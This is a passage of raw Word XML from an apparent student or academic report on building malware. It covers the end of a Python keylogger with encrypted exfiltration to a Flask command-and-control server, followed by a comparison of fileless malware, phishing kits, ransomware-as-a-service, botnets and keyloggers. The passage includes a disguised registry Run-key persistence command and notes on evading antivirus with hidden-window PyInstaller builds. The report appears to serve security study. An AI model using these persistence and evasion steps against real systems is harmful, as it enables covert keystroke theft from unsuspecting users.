          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>f.write</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="0002236F">
        <w:rPr>
          <w:rFonts w:ascii="Cascadia Code" w:hAnsi="Cascadia Code" w:cs="Cascadia Code"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>(f"{data['timestamp']} - {</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="0002236F">
        <w:rPr>
          <w:rFonts w:ascii="Cascadia Code" w:hAnsi="Cascadia Code" w:cs="Cascadia Code"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>decrypted_</w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="0002236F">
        <w:rPr>
          <w:rFonts w:ascii="Cascadia Code" w:hAnsi="Cascadia Code" w:cs="Cascadia Code"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>text</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="0002236F">
        <w:rPr>
          <w:rFonts w:ascii="Cascadia Code" w:hAnsi="Cascadia Code" w:cs="Cascadia Code"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>}\</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="0002236F">
        <w:rPr>
          <w:rFonts w:ascii="Cascadia Code" w:hAnsi="Cascadia Code" w:cs="Cascadia Code"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>n")</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4AD2C67C" w14:textId="269FF64A" w:rsidR="002926C7" w:rsidRPr="00327E8E" w:rsidRDefault="002926C7" w:rsidP="002926C7">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00327E8E">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Persistence Mechanism</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="35A4C19F" w14:textId="49C68DD9" w:rsidR="002926C7" w:rsidRPr="00B9065E" w:rsidRDefault="002926C7" w:rsidP="002926C7">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00B9065E">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
        </w:rPr>
        <w:t>To ensure the keylogger restarted with the system, a registry entry was added:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2673A4D9" w14:textId="52717F80" w:rsidR="002926C7" w:rsidRPr="00A766D6" w:rsidRDefault="002926C7" w:rsidP="002926C7">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Cascadia Code" w:hAnsi="Cascadia Code" w:cs="Cascadia Code"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00A766D6">
        <w:rPr>
          <w:rFonts w:ascii="Cascadia Code" w:hAnsi="Cascadia Code" w:cs="Cascadia Code"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Run /v SystemMonitor /t REG_SZ /d "C:\Users\&lt;user&gt;\AppData\Roaming\system_monitor.exe"</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3D87D680" w14:textId="77777777" w:rsidR="002926C7" w:rsidRPr="00B9065E" w:rsidRDefault="002926C7" w:rsidP="002926C7">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00B9065E">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
        </w:rPr>
        <w:t>This allowed the keylogger to automatically relaunch after every system reboot without user interaction, replicating the persistence techniques discussed by Bhardwaj and Goundar (2020).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="76A38B07" w14:textId="613C9486" w:rsidR="002926C7" w:rsidRPr="008217DA" w:rsidRDefault="002926C7" w:rsidP="002926C7">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="000B1B0C">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Results &amp; Observations</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1E384E61" w14:textId="6C1AB896" w:rsidR="002926C7" w:rsidRPr="00B9065E" w:rsidRDefault="002926C7" w:rsidP="002926C7">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00B9065E">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
        </w:rPr>
        <w:t>The keylogger performed as expected, capturing and transmitting keystrokes with precise timestamps. The use of AES encryption ensured that even intercepted network traffic did not reveal cleartext inputs. The Flask server received and stored logs in near real time. No antivirus alerts were triggered during testing, particularly when the executable was obfuscated using PyInstaller with hidden window mode.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="002A20D7" w14:textId="58283F83" w:rsidR="002926C7" w:rsidRPr="00B9065E" w:rsidRDefault="002926C7" w:rsidP="002926C7">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00B9065E">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
        </w:rPr>
        <w:t>These outcomes confirmed the observations made by Mourya et al. (2024), especially regarding the viability of encrypted, remote C2 structures. The stealth and persistence aspects also validated the attack patterns described in Bhardwaj and Goundar (2020), including registry-based startup and process invisibility.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6B3A9877" w14:textId="77777777" w:rsidR="002926C7" w:rsidRPr="00B9065E" w:rsidRDefault="002926C7" w:rsidP="002926C7">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00B9065E">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>This implementation demonstrated how a basic Python script, when extended with realistic features, can become a full-fledged surveillance tool—capable of bypassing common detection and sustaining long-term access.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="64535971" w14:textId="1B196985" w:rsidR="002926C7" w:rsidRPr="008217DA" w:rsidRDefault="002926C7" w:rsidP="002926C7">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="008217DA">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Conclusion of Experimentation</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6C9B278E" w14:textId="7319C569" w:rsidR="002926C7" w:rsidRPr="00B9065E" w:rsidRDefault="002926C7" w:rsidP="002926C7">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00B9065E">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
        </w:rPr>
        <w:t>Both malware implementations—fileless malware and the C2-enabled keylogger—revealed how effective even basic tools can be when combined with stealth, obfuscation, and legitimate system processes. The keylogger emphasi</w:t>
      </w:r>
      <w:r w:rsidR="00293279">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
        </w:rPr>
        <w:t>s</w:t>
      </w:r>
      <w:r w:rsidRPr="00B9065E">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
        </w:rPr>
        <w:t>ed data exfiltration and persistence, while the fileless malware focused on in-memory execution and undetectability. In both cases, the use of free, widely available tools showed that advanced attacks are not limited to state-sponsored actors but are well within reach of low-to-mid skill adversaries.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="494BF6B3" w14:textId="77777777" w:rsidR="00612745" w:rsidRPr="008217DA" w:rsidRDefault="00612745" w:rsidP="008217DA">
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="215E99" w:themeColor="text2" w:themeTint="BF"/>
          <w:sz w:val="34"/>
          <w:szCs w:val="34"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="12" w:name="_Toc194070987"/>
      <w:r w:rsidRPr="008217DA">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="215E99" w:themeColor="text2" w:themeTint="BF"/>
          <w:sz w:val="34"/>
          <w:szCs w:val="34"/>
        </w:rPr>
        <w:t>4. Comparative Analysis</w:t>
      </w:r>
      <w:bookmarkEnd w:id="12"/>
    </w:p>
    <w:p w14:paraId="081C8FEB" w14:textId="77777777" w:rsidR="00612745" w:rsidRPr="008217DA" w:rsidRDefault="00612745" w:rsidP="00612745">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="008217DA">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
        </w:rPr>
        <w:t xml:space="preserve">Each of the five malware developments reviewed in this report reflects a different attack philosophy—ranging from stealth and long-term persistence to speed, impact, or psychological manipulation. To understand their relative strengths and practical threats, they must be compared across consistent criteria: </w:t>
      </w:r>
      <w:r w:rsidRPr="008217DA">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>stealth</w:t>
      </w:r>
      <w:r w:rsidRPr="008217DA">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
        </w:rPr>
        <w:t xml:space="preserve">, </w:t>
      </w:r>
      <w:r w:rsidRPr="008217DA">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>damage potential</w:t>
      </w:r>
      <w:r w:rsidRPr="008217DA">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
        </w:rPr>
        <w:t xml:space="preserve">, </w:t>
      </w:r>
      <w:r w:rsidRPr="008217DA">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>ease of implementation</w:t>
      </w:r>
      <w:r w:rsidRPr="008217DA">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
        </w:rPr>
        <w:t xml:space="preserve">, </w:t>
      </w:r>
      <w:r w:rsidRPr="008217DA">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>tool availability</w:t>
      </w:r>
      <w:r w:rsidRPr="008217DA">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
        </w:rPr>
        <w:t xml:space="preserve">, and </w:t>
      </w:r>
      <w:r w:rsidRPr="008217DA">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>resilience against detection</w:t>
      </w:r>
      <w:r w:rsidRPr="008217DA">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3D59561C" w14:textId="2EB0390D" w:rsidR="00612745" w:rsidRPr="008217DA" w:rsidRDefault="00612745" w:rsidP="00612745">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="008217DA">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
        </w:rPr>
        <w:t>This comparison draws not only from academic literature but also from practical experimentation and the observed behavior of each malware type during sandbox testing.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="27494B36" w14:textId="77777777" w:rsidR="00612745" w:rsidRPr="008217DA" w:rsidRDefault="00612745" w:rsidP="00612745">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="008217DA">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Fileless Malware</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="41D724B1" w14:textId="77777777" w:rsidR="00612745" w:rsidRPr="008217DA" w:rsidRDefault="00612745" w:rsidP="00612745">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="008217DA">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
        </w:rPr>
        <w:t>Fileless malware is engineered for stealth. By running entirely in memory and avoiding any interaction with disk storage, it evades traditional antivirus software and file-based scanning tools. As shown in the experiment, a PowerShell payload can be executed with a single obfuscated command, triggering a reverse shell without leaving a file behind. According to Sun et al. (2023), less than 12% of these attacks are detected during execution, highlighting their invisibility. However, setup requires moderate scripting knowledge and is often limited to systems with PowerShell or WMI access.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="35AC08E7" w14:textId="59AE1DFC"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Extremely stealthy; avoids signature detection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privileged PowerShell use and scripting skill</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="23DE660E" w14:textId="77777777" w:rsidR="00612745" w:rsidRPr="008217DA" w:rsidRDefault="00612745" w:rsidP="00612745">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="008217DA">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Phishing-Based Credential Stealers</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="25FDDC49" w14:textId="77777777" w:rsidR="00612745" w:rsidRPr="008217DA" w:rsidRDefault="00612745" w:rsidP="00612745">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="008217DA">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
        </w:rPr>
        <w:t xml:space="preserve">Phishing remains one of the most successful attack vectors—not because of advanced code, but because it preys on human error. Even with modern training, users often fall for fake login screens when visual cues like logos and HTTPS are present (Bashir &amp; Papadopoulos, 2023). Credential stealers are incredibly easy to deploy using kits like </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="008217DA">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
        </w:rPr>
        <w:t>HiddenEye</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="008217DA">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
        </w:rPr>
        <w:t xml:space="preserve"> or </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="008217DA">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
        </w:rPr>
        <w:t>SocialFish</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="008217DA">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
        </w:rPr>
        <w:t>. However, they are highly dependent on user action and cannot operate autonomously once detected.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5E44FB6C" w14:textId="1C8AC05B" w:rsidR="00612745" w:rsidRPr="008217DA" w:rsidRDefault="00612745" w:rsidP="00612745">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="008217DA">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>Strengths:</w:t>
      </w:r>
      <w:r w:rsidRPr="008217DA">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
        </w:rPr>
        <w:t xml:space="preserve"> Simple to implement, highly effective at scale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Relies on user interaction and social engineering</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="176E3514" w14:textId="77777777" w:rsidR="00612745" w:rsidRPr="008217DA" w:rsidRDefault="00612745" w:rsidP="00612745">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="008217DA">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Ransomware-as-a-Service (RaaS)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="79F707BE" w14:textId="1A1935E8" w:rsidR="00612745" w:rsidRPr="008217DA" w:rsidRDefault="00612745" w:rsidP="00612745">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="008217DA">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
        </w:rPr>
        <w:t>RaaS demonstrates the professionali</w:t>
      </w:r>
      <w:r w:rsidR="00293279">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
        </w:rPr>
        <w:t>s</w:t>
      </w:r>
      <w:r w:rsidRPr="008217DA">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
        </w:rPr>
        <w:t>ation of malware. Developers create powerful ransomware payloads and distribute them to affiliates for a share of the ransom. Ahmed et al. (2023) describe this model as “cybercrime franchising,” offering user dashboards, encryption tools, and technical support. Payloads are modular and often include obfuscation, anti-debugging, and hybrid encryption schemes. While damaging, these attacks are very visible, drawing attention from law enforcement and threat intelligence groups.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7EDFA3EF" w14:textId="795A6712"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High impact, scalable attacks with built-in encryption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High visibility; difficult to test or simulate ethically</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="64A0F452" w14:textId="77777777" w:rsidR="00612745" w:rsidRPr="008217DA" w:rsidRDefault="00612745" w:rsidP="00612745">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="008217DA">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Botnet Malware</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0DC9C83B" w14:textId="77777777" w:rsidR="00612745" w:rsidRPr="008217DA" w:rsidRDefault="00612745" w:rsidP="00612745">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="008217DA">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
        </w:rPr>
        <w:t>Botnets represent long-term control rather than quick payoff. They infect multiple devices and operate silently in the background, waiting for instructions from a C2 server. As demonstrated in simulation, bots can be programmed to respond to various tasks like pinging, exfiltrating data, or launching DDoS attacks. Singh et al. (2022) and Marczak &amp; Paxson (2023) highlight their use in both espionage and large-scale disruption. Botnets require multiple nodes and basic infrastructure, but offer wide operational flexibility.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="29F67669" w14:textId="223AE030"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Distributed control, supports multi-stage attacks</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infrastructure and traffic analysis can expose them</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6F296B5D" w14:textId="77777777" w:rsidR="00612745" w:rsidRPr="008217DA" w:rsidRDefault="00612745" w:rsidP="00612745">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="008217DA">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Keylogger-Based Malware</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5422C997" w14:textId="2C065BC3" w:rsidR="00BF4801" w:rsidRDefault="00612745" w:rsidP="00612745">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="008217DA">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
        </w:rPr>
        <w:t>Keyloggers are often underestimated, yet they form the foundation of many advanced attacks. When combined with C2 capabilities and persistence, as shown in the implementation, they can silently record and transmit everything a user types. Mourya et al. (2024) emphasi</w:t>
      </w:r>
      <w:r w:rsidR="00293279">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
        </w:rPr>
        <w:t>s</w:t>
      </w:r>
      <w:r w:rsidRPr="008217DA">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
        </w:rPr>
        <w:t>e how modern keyloggers now include encryption and stealth features. They are easy to build, require few dependencies, and are rarely flagged by antivirus tools unless paired with known malicious behavior.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="52083813" w14:textId="5D5C57FF"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Lightweight, effective, and highly customi</w:t>
      </w:r>
      <w:r w:rsidR="00293279">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
        </w:rPr>
        <w:t>s</w:t>
      </w:r>
      <w:r w:rsidRPr="008217DA">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
        </w:rPr>
        <w:t>able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Logs must be exfiltrated carefully to avoid triggering detection</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="205C0DE4" w14:textId="77777777" w:rsidR="00612745" w:rsidRPr="008217DA" w:rsidRDefault="00612745" w:rsidP="00612745">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="008217DA">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Side-by-Side Comparison</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1169"/>
        <w:gridCol w:w="1126"/>
        <w:gridCol w:w="1831"/>
        <w:gridCol w:w="1193"/>
        <w:gridCol w:w="2185"/>
      </w:tblGrid>
      <w:tr w:rsidR="0098508D" w:rsidRPr="0098508D" w14:paraId="784BE116" w14:textId="77777777" w:rsidTr="0098508D">
        <w:trPr>
          <w:trHeight w:val="945"/>
          <w:jc w:val="center"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1563" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="3250DA9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Malware Type</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1169" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="62DECAE4"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Stealth</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1126" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="181A663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Damage Potential</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1831" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="47D04092"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Ease of Implementation</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1193" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="1B49ECCB"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Detection Risk</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2185" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="7E0DF3B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Tools Required</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="0098508D" w:rsidRPr="0098508D" w14:paraId="65AF4639" w14:textId="77777777" w:rsidTr="0098508D">
        <w:trPr>
          <w:trHeight w:val="1260"/>
          <w:jc w:val="center"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1563" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="120703F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Fileless Malware</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1169" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="322F5DF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126" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="5E349AA8"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231DF54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4F575AE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6546BC36"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PowerShell, Metasploit</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="0098508D" w:rsidRPr="0098508D" w14:paraId="0AF15B03" w14:textId="77777777" w:rsidTr="0098508D">
        <w:trPr>
          <w:trHeight w:val="1260"/>
          <w:jc w:val="center"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
